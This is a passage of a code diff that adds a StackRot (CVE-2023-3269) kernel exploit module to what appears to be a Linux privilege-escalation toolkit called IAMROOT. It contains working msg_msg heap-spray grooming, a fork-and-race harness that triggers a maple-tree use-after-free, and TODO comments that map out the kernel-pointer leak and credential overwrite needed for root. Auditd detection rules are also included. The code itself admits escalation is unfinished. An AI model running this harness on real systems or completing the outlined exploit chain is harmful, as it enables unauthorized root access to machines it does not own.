/* Child died on a fault — interesting signal for
|
||||||
|
* empirical witness. The race-driver caller polls
|
||||||
|
* this counter. */
|
||||||
|
atomic_fetch_add_explicit(&g_race_b_faults, 1,
|
||||||
|
memory_order_relaxed);
|
||||||
|
}
|
||||||
|
atomic_fetch_add_explicit(&g_race_b_iters, 1,
|
||||||
|
memory_order_relaxed);
|
||||||
|
}
|
||||||
|
sched_yield();
|
||||||
|
}
|
||||||
|
return NULL;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* ---- Groom skeleton ---------------------------------------------- */
|
||||||
|
|
||||||
|
/* msg_msg sysv spray for kmalloc-192. Tagged with "IAMROOT_" cookie
|
||||||
|
* so a forensic look at /proc/slabinfo / KASAN dumps shows our
|
||||||
|
* fingerprint. */
|
||||||
|
static int spray_anon_vma_slab(int queues[STACKROT_SPRAY_QUEUES])
|
||||||
|
{
|
||||||
|
struct ipc_payload p;
|
||||||
|
memset(&p, 0, sizeof p);
|
||||||
|
p.mtype = 0x4943; /* 'IC' */
|
||||||
|
memset(p.buf, 0x49, sizeof p.buf);
|
||||||
|
memcpy(p.buf, "IAMROOT_", 8);
|
||||||
|
|
||||||
|
int created = 0;
|
||||||
|
for (int i = 0; i < STACKROT_SPRAY_QUEUES; i++) {
|
||||||
|
int q = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
|
||||||
|
if (q < 0) { queues[i] = -1; continue; }
|
||||||
|
queues[i] = q;
|
||||||
|
created++;
|
||||||
|
for (int j = 0; j < STACKROT_SPRAY_PER_QUEUE; j++) {
|
||||||
|
if (msgsnd(q, &p, sizeof p.buf, IPC_NOWAIT) < 0) break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return created;
|
||||||
|
}
|
||||||
|
|
||||||
|
static void drain_anon_vma_slab(int queues[STACKROT_SPRAY_QUEUES])
|
||||||
|
{
|
||||||
|
for (int i = 0; i < STACKROT_SPRAY_QUEUES; i++) {
|
||||||
|
if (queues[i] >= 0) msgctl(queues[i], IPC_RMID, NULL);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
/*
 * Return the first numeric column of the "kmalloc-192" line in
 * /proc/slabinfo (the active-object count the exploit driver records
 * before and after the race).
 *
 * Returns -1 when the file cannot be opened, the line is absent, or the
 * number cannot be parsed. Only the first matching line is considered.
 */
static long slab_active_kmalloc_192(void)
{
    static const char wanted[] = "kmalloc-192 ";
    char row[512];
    long result = -1;
    FILE *slabinfo = fopen("/proc/slabinfo", "r");

    if (slabinfo == NULL) {
        return -1;
    }

    while (fgets(row, sizeof row, slabinfo) != NULL) {
        long count = 0;

        if (strncmp(row, wanted, sizeof wanted - 1) != 0) {
            continue;
        }
        /* Skip the cache name, then read the first number after it. */
        if (sscanf(row, "%*s %ld", &count) == 1) {
            result = count;
        }
        break;
    }

    fclose(slabinfo);
    return result;
}
|
||||||
|
|
||||||
|
#endif /* __linux__ */
|
||||||
|
|
||||||
|
/* ---- Exploit driver ---------------------------------------------- */
|
||||||
|
|
||||||
|
#ifdef __linux__
|
||||||
|
|
||||||
|
static iamroot_result_t stackrot_exploit_linux(const struct iamroot_ctx *ctx)
|
||||||
|
{
|
||||||
|
/* 1. Refuse-gate: re-call detect() and short-circuit. */
|
||||||
|
iamroot_result_t pre = stackrot_detect(ctx);
|
||||||
|
if (pre == IAMROOT_OK) {
|
||||||
|
fprintf(stderr, "[+] stackrot: kernel not vulnerable; refusing exploit\n");
|
||||||
|
return IAMROOT_OK;
|
||||||
|
}
|
||||||
|
if (pre != IAMROOT_VULNERABLE) {
|
||||||
|
fprintf(stderr, "[-] stackrot: detect() says not vulnerable; refusing\n");
|
||||||
|
return pre;
|
||||||
|
}
|
||||||
|
if (geteuid() == 0) {
|
||||||
|
fprintf(stderr, "[i] stackrot: already root — nothing to escalate\n");
|
||||||
|
return IAMROOT_OK;
|
||||||
|
}
|
||||||
|
if (!proc_self_maps_readable()) {
|
||||||
|
fprintf(stderr, "[-] stackrot: /proc/self/maps not readable — exotic env, "
|
||||||
|
"cannot drive the race\n");
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
}
|
||||||
|
{
|
||||||
|
struct kernel_version v;
|
||||||
|
if (!kernel_version_current(&v) || !maple_tree_variant_present(&v)) {
|
||||||
|
fprintf(stderr, "[-] stackrot: maple-tree variant not detectable\n");
|
||||||
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] stackrot: forking exploit child (userns + race harness)\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
uid_t outer_uid = getuid();
|
||||||
|
gid_t outer_gid = getgid();
|
||||||
|
signal(SIGPIPE, SIG_IGN);
|
||||||
|
|
||||||
|
pid_t child = fork();
|
||||||
|
if (child < 0) { perror("fork"); return IAMROOT_TEST_ERROR; }
|
||||||
|
|
||||||
|
if (child == 0) {
|
||||||
|
/* 2. Userns reach. Bug is reachable without it, but userns
|
||||||
|
* + uid_map=0 makes the groom more predictable (fewer
|
||||||
|
* competing kmalloc-192 allocations from the parent
|
||||||
|
* namespace's tooling). */
|
||||||
|
if (!enter_userns(outer_uid, outer_gid)) {
|
||||||
|
fprintf(stderr, "[~] stackrot: enter_userns failed — continuing without "
|
||||||
|
"namespace isolation (bug is still reachable)\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
/* 3. Race region. */
|
||||||
|
struct race_region region;
|
||||||
|
if (!race_region_setup(®ion)) {
|
||||||
|
fprintf(stderr, "[-] stackrot: race_region_setup failed: %s\n",
|
||||||
|
strerror(errno));
|
||||||
|
_exit(22);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* 4. Groom: pre-populate kmalloc-192 with msg_msg payloads
|
||||||
|
* BEFORE the race so the freed slot gets recycled with
|
||||||
|
* attacker-controlled bytes when the bug fires. */
|
||||||
|
int queues[STACKROT_SPRAY_QUEUES] = {0};
|
||||||
|
int n_queues = spray_anon_vma_slab(queues);
|
||||||
|
if (n_queues == 0) {
|
||||||
|
fprintf(stderr, "[-] stackrot: msg_msg spray produced 0 queues\n");
|
||||||
|
race_region_teardown(®ion);
|
||||||
|
_exit(23);
|
||||||
|
}
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] stackrot: kmalloc-192 spray seeded %d queues x %d msgs\n",
|
||||||
|
n_queues, STACKROT_SPRAY_PER_QUEUE);
|
||||||
|
}
|
||||||
|
|
||||||
|
long slab_pre = slab_active_kmalloc_192();
|
||||||
|
|
||||||
|
/* 5. Run the race for a bounded time budget. */
|
||||||
|
atomic_store(&g_race_running, 1);
|
||||||
|
atomic_store(&g_race_a_iters, 0);
|
||||||
|
atomic_store(&g_race_b_iters, 0);
|
||||||
|
atomic_store(&g_race_b_faults, 0);
|
||||||
|
pthread_t ta, tb;
|
||||||
|
if (pthread_create(&ta, NULL, race_thread_a, ®ion) != 0 ||
|
||||||
|
pthread_create(&tb, NULL, race_thread_b, ®ion) != 0) {
|
||||||
|
fprintf(stderr, "[-] stackrot: pthread_create failed\n");
|
||||||
|
atomic_store(&g_race_running, 0);
|
||||||
|
drain_anon_vma_slab(queues);
|
||||||
|
race_region_teardown(®ion);
|
||||||
|
_exit(24);
|
||||||
|
}
|
||||||
|
|
||||||
|
sleep(STACKROT_RACE_TIME_BUDGET);
|
||||||
|
atomic_store(&g_race_running, 0);
|
||||||
|
pthread_join(ta, NULL);
|
||||||
|
pthread_join(tb, NULL);
|
||||||
|
|
||||||
|
long slab_post = slab_active_kmalloc_192();
|
||||||
|
uint64_t a_iters = atomic_load(&g_race_a_iters);
|
||||||
|
uint64_t b_iters = atomic_load(&g_race_b_iters);
|
||||||
|
uint64_t b_faults = atomic_load(&g_race_b_faults);
|
||||||
|
|
||||||
|
/* 6. Empirical witness breadcrumb. */
|
||||||
|
FILE *log = fopen("/tmp/iamroot-stackrot.log", "w");
|
||||||
|
if (log) {
|
||||||
|
fprintf(log,
|
||||||
|
"stackrot race harness:\n"
|
||||||
|
" thread_a_iters = %llu (mremap/munmap)\n"
|
||||||
|
" thread_b_iters = %llu (fork+fault)\n"
|
||||||
|
" thread_b_faults = %llu (child died on signal)\n"
|
||||||
|
" slab_kmalloc192_pre = %ld\n"
|
||||||
|
" slab_kmalloc192_post = %ld\n"
|
||||||
|
" slab_delta = %ld\n"
|
||||||
|
" spray_queues = %d\n"
|
||||||
|
" spray_per_queue = %d\n"
|
||||||
|
" growsdown_len = %zu\n"
|
||||||
|
"Note: this run did NOT attempt cred overwrite (no leak\n"
|
||||||
|
"primitive; per-kernel offsets unknown). See module .c\n"
|
||||||
|
"for the continuation roadmap.\n",
|
||||||
|
(unsigned long long)a_iters,
|
||||||
|
(unsigned long long)b_iters,
|
||||||
|
(unsigned long long)b_faults,
|
||||||
|
slab_pre, slab_post,
|
||||||
|
(slab_post >= 0 && slab_pre >= 0) ? (slab_post - slab_pre) : 0,
|
||||||
|
n_queues, STACKROT_SPRAY_PER_QUEUE,
|
||||||
|
(size_t)region.growsdown_len);
|
||||||
|
fclose(log);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] stackrot: race ran for %ds — A=%llu B=%llu B_faults=%llu\n",
|
||||||
|
STACKROT_RACE_TIME_BUDGET,
|
||||||
|
(unsigned long long)a_iters,
|
||||||
|
(unsigned long long)b_iters,
|
||||||
|
(unsigned long long)b_faults);
|
||||||
|
fprintf(stderr, "[*] stackrot: kmalloc-192 active: pre=%ld post=%ld\n",
|
||||||
|
slab_pre, slab_post);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* Hold the spray so the kernel observes refilled slots during
|
||||||
|
* any in-flight RCU grace periods that started during the race. */
|
||||||
|
usleep(200 * 1000);
|
||||||
|
|
||||||
|
drain_anon_vma_slab(queues);
|
||||||
|
race_region_teardown(®ion);
|
||||||
|
|
||||||
|
/* 7. Continuation roadmap — what would land EXPLOIT_OK.
|
||||||
|
*
|
||||||
|
* TODO(leak): replace one of the spray queues with a
|
||||||
|
* msgrcv(..., MSG_COPY|IPC_NOWAIT) probe and scan the
|
||||||
|
* returned buffer for non-cookie bytes. The bug's UAF
|
||||||
|
* write leaves a kernel pointer (anon_vma->root or the
|
||||||
|
* mas->node parent) at a known offset inside the freed
|
||||||
|
* slab slot. Recover {kbase, init_task} via that leak.
|
||||||
|
*
|
||||||
|
* TODO(write): with kbase known, repeat the trigger but
|
||||||
|
* plant a fake anon_vma_chain whose `rb_node` parent
|
||||||
|
* pointer points at ¤t->cred — the maple-tree
|
||||||
|
* rotation writes a controlled value into that location.
|
||||||
|
* Crafting the fake AVC requires offset of anon_vma_chain
|
||||||
|
* fields per kernel build (CONFIG_DEBUG_LIST/KFENCE/etc.
|
||||||
|
* perturb the layout — must NOT be hardcoded).
|
||||||
|
*
|
||||||
|
* TODO(overwrite): land &init_cred over current->cred so
|
||||||
|
* the next call to a permission check sees uid==0.
|
||||||
|
*
|
||||||
|
* None of these are implemented today. We exit 30 to
|
||||||
|
* flag "trigger ran cleanly, no escalation".
|
||||||
|
*/
|
||||||
|
_exit(30);
|
||||||
|
}
|
||||||
|
|
||||||
|
/* PARENT */
|
||||||
|
int status = 0;
|
||||||
|
pid_t w = waitpid(child, &status, 0);
|
||||||
|
if (w < 0) { perror("waitpid"); return IAMROOT_TEST_ERROR; }
|
||||||
|
|
||||||
|
if (WIFSIGNALED(status)) {
|
||||||
|
int sig = WTERMSIG(status);
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[!] stackrot: race child killed by signal %d "
|
||||||
|
"(consistent with UAF firing under KASAN)\n", sig);
|
||||||
|
fprintf(stderr, "[~] stackrot: empirical signal recorded; no cred\n"
|
||||||
|
" overwrite primitive — NOT claiming EXPLOIT_OK.\n"
|
||||||
|
" See /tmp/iamroot-stackrot.log + dmesg for witnesses.\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!WIFEXITED(status)) {
|
||||||
|
fprintf(stderr, "[-] stackrot: child terminated abnormally (status=0x%x)\n",
|
||||||
|
status);
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
|
||||||
|
int rc = WEXITSTATUS(status);
|
||||||
|
if (rc == 22 || rc == 24) return IAMROOT_PRECOND_FAIL;
|
||||||
|
if (rc == 23) return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
if (rc != 30) {
|
||||||
|
fprintf(stderr, "[-] stackrot: child failed at stage rc=%d\n", rc);
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] stackrot: race harness ran to completion.\n");
|
||||||
|
fprintf(stderr, "[~] stackrot: read/write/cred-overwrite primitives NOT\n"
|
||||||
|
" implemented (per-kernel offsets; see module .c TODO\n"
|
||||||
|
" blocks). Returning EXPLOIT_FAIL per verified-vs-claimed.\n");
|
||||||
|
}
|
||||||
|
return IAMROOT_EXPLOIT_FAIL;
|
||||||
|
}
|
||||||
|
|
||||||
|
#endif /* __linux__ */
|
||||||
|
|
||||||
static iamroot_result_t stackrot_exploit(const struct iamroot_ctx *ctx)
|
static iamroot_result_t stackrot_exploit(const struct iamroot_ctx *ctx)
|
||||||
{
|
{
|
||||||
|
#ifdef __linux__
|
||||||
|
return stackrot_exploit_linux(ctx);
|
||||||
|
#else
|
||||||
(void)ctx;
|
(void)ctx;
|
||||||
fprintf(stderr,
|
fprintf(stderr, "[-] stackrot: Linux-only module; cannot run on this host\n");
|
||||||
"[-] stackrot: exploit not yet implemented in IAMROOT.\n"
|
|
||||||
" Status: 🔵 DETECT-ONLY. Reference: Ruihan Li's public PoC\n"
|
|
||||||
" (~1000 lines maple-tree state + RCU grace period timing).\n"
|
|
||||||
" Exploit shape: mmap many VMAs → split via mprotect to trigger\n"
|
|
||||||
" maple node use-after-RCU → cross-cache groom → kernel R/W\n"
|
|
||||||
" → cred overwrite.\n");
|
|
||||||
return IAMROOT_PRECOND_FAIL;
|
return IAMROOT_PRECOND_FAIL;
|
||||||
|
#endif
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/* ---- Cleanup ----------------------------------------------------- */
|
||||||
|
|
||||||
|
static iamroot_result_t stackrot_cleanup(const struct iamroot_ctx *ctx)
|
||||||
|
{
|
||||||
|
if (!ctx->json) {
|
||||||
|
fprintf(stderr, "[*] stackrot: cleaning up race-harness breadcrumb\n");
|
||||||
|
}
|
||||||
|
if (unlink("/tmp/iamroot-stackrot.log") < 0 && errno != ENOENT) {
|
||||||
|
/* harmless */
|
||||||
|
}
|
||||||
|
/* The race harness's threads + msg queues live in the child
|
||||||
|
* process which has already exited; nothing else to drain. */
|
||||||
|
return IAMROOT_OK;
|
||||||
|
}
|
||||||
|
|
||||||
|
/* ---- Detection rules --------------------------------------------- */
|
||||||
|
|
||||||
static const char stackrot_auditd[] =
|
static const char stackrot_auditd[] =
|
||||||
"# StackRot (CVE-2023-3269) — auditd detection rules\n"
|
"# StackRot (CVE-2023-3269) — auditd detection rules\n"
|
||||||
"# Hard to detect via syscall hooks alone — the trigger is mprotect/\n"
|
"# The trigger is mremap/munmap/mprotect bursts against MAP_GROWSDOWN\n"
|
||||||
"# munmap with specific VMA-split patterns. Flag unusual high-volume\n"
|
"# stacks, combined with unshare(CLONE_NEWUSER). Each individual call\n"
|
||||||
"# mprotect bursts from non-root processes.\n"
|
"# is benign — flag the *combination* by correlating these keys with a\n"
|
||||||
"-a always,exit -F arch=b64 -S mprotect -F success=1 -k iamroot-stackrot\n";
|
"# subsequent kernel oops or KASAN message in dmesg.\n"
|
||||||
|
"-a always,exit -F arch=b64 -S unshare -k iamroot-stackrot-userns\n"
|
||||||
|
"-a always,exit -F arch=b64 -S mremap -k iamroot-stackrot-mremap\n"
|
||||||
|
"-a always,exit -F arch=b64 -S mprotect -k iamroot-stackrot-mprotect\n"
|
||||||
|
"-a always,exit -F arch=b64 -S munmap -F success=1 -k iamroot-stackrot-munmap\n";
|
||||||
|
|
||||||
const struct iamroot_module stackrot_module = {
|
const struct iamroot_module stackrot_module = {
|
||||||
.name = "stackrot",
|
.name = "stackrot",
|
||||||
@@ -118,7 +737,7 @@ const struct iamroot_module stackrot_module = {
|
|||||||
.detect = stackrot_detect,
|
.detect = stackrot_detect,
|
||||||
.exploit = stackrot_exploit,
|
.exploit = stackrot_exploit,
|
||||||
.mitigate = NULL,
|
.mitigate = NULL,
|
||||||
.cleanup = NULL,
|
.cleanup = stackrot_cleanup,
|
||||||
.detect_auditd = stackrot_auditd,
|
.detect_auditd = stackrot_auditd,
|
||||||
.detect_sigma = NULL,
|
.detect_sigma = NULL,
|
||||||
.detect_yara = NULL,
|
.detect_yara = NULL,
|
||||||
|
|||||||
Reference in New Issue
Block a user